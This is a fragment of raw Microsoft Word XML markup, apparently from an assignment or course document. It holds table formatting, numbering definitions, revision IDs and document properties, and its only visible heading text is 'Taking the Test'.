                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34B0CDB4" w14:textId="7DD990E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E29D87D" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5476ED17" w14:textId="79A9F2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Taking the Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71726651" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CCC1EE5" w14:textId="1E9A27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7146CFFD" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="066312F3" w14:textId="07C98D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303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A09A3D0" w14:textId="1AE9102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4"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9F738B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C652D91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2B5733"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FADA01F6"/>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A13541"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="824AF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4570E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7BF00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3227959">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="730345073">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="442502861">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1759449178">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1337614253">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1899902729">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1847137183">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1140457709">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1508910218">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="350881188">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="169300240">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="44063332">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="617643956">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1228227898">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="853571747">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1494176624">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1184855497">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="880173853">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1119714849">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="45374067">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="921253157">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="297301359">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1304039053">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1845898013">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="559025177">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="25109893">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="594946370">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1983807312">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="912590134">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="471562334">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1804618147">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1036810954">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1076707844">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1624921277">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="779685406">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="541400971">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="243877396">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1637906529">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1132673129">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="857700271">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="5919350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51475"/>
    <w:rsid w:val="00055B52"/>
    <w:rsid w:val="000B4054"/>
    <w:rsid w:val="000C2DB2"/>
    <w:rsid w:val="000D2BA4"/>
    <w:rsid w:val="000F53F8"/>
    <w:rsid w:val="0011119D"/>
    <w:rsid w:val="0018497E"/>
    <w:rsid w:val="002257B2"/>
    <w:rsid w:val="0025478D"/>
    <w:rsid w:val="00272FB9"/>
    <w:rsid w:val="00303D06"/>
    <w:rsid w:val="0032328D"/>
    <w:rsid w:val="00327A25"/>
    <w:rsid w:val="00335AF4"/>
    <w:rsid w:val="003654AC"/>
    <w:rsid w:val="003C03D7"/>
    <w:rsid w:val="003E19DA"/>
    <w:rsid w:val="004B4EAC"/>
    <w:rsid w:val="004D6C2F"/>
    <w:rsid w:val="00510733"/>
    <w:rsid w:val="00561898"/>
    <w:rsid w:val="005758F1"/>
    <w:rsid w:val="00580E51"/>
    <w:rsid w:val="005A6119"/>
    <w:rsid w:val="005C13FC"/>
    <w:rsid w:val="00606A5B"/>
    <w:rsid w:val="006206C8"/>
    <w:rsid w:val="0064135C"/>
    <w:rsid w:val="00653DBF"/>
    <w:rsid w:val="00675655"/>
    <w:rsid w:val="0069793F"/>
    <w:rsid w:val="006B3066"/>
    <w:rsid w:val="006D2F28"/>
    <w:rsid w:val="006D7029"/>
    <w:rsid w:val="006F5A04"/>
    <w:rsid w:val="006F6673"/>
    <w:rsid w:val="00724E07"/>
    <w:rsid w:val="0078653F"/>
    <w:rsid w:val="007B1E21"/>
    <w:rsid w:val="007E6E57"/>
    <w:rsid w:val="008058F2"/>
    <w:rsid w:val="008416D3"/>
    <w:rsid w:val="0084599D"/>
    <w:rsid w:val="0087079C"/>
    <w:rsid w:val="00873994"/>
    <w:rsid w:val="008C078C"/>
    <w:rsid w:val="008C6E66"/>
    <w:rsid w:val="00947C61"/>
    <w:rsid w:val="00960C6F"/>
    <w:rsid w:val="00994D0F"/>
    <w:rsid w:val="009956E1"/>
    <w:rsid w:val="009D33DB"/>
    <w:rsid w:val="00A038CA"/>
    <w:rsid w:val="00A34115"/>
    <w:rsid w:val="00A55FAA"/>
    <w:rsid w:val="00A73B19"/>
    <w:rsid w:val="00AC7023"/>
    <w:rsid w:val="00B7479B"/>
    <w:rsid w:val="00BA5F25"/>
    <w:rsid w:val="00BE48E4"/>
    <w:rsid w:val="00C2706D"/>
    <w:rsid w:val="00CE5136"/>
    <w:rsid w:val="00D26A1B"/>
    <w:rsid w:val="00D40E3C"/>
    <w:rsid w:val="00DC1EFC"/>
    <w:rsid w:val="00DE7794"/>
    <w:rsid w:val="00E05502"/>
    <w:rsid w:val="00EB096B"/>
    <w:rsid w:val="00EC396B"/>
    <w:rsid w:val="00F82307"/>
    <w:rsid w:val="00F96D08"/>
    <w:rsid w:val="00FA2558"/>
    <w:rsid w:val="00FC3F99"/>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semiHidden/>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3logparse.p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18</Pages>
  <Words>6284</Words>
  <Characters>34878</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>2491</Lines>
  <Paragraphs>2058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7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-02T22:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-12T23:04:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>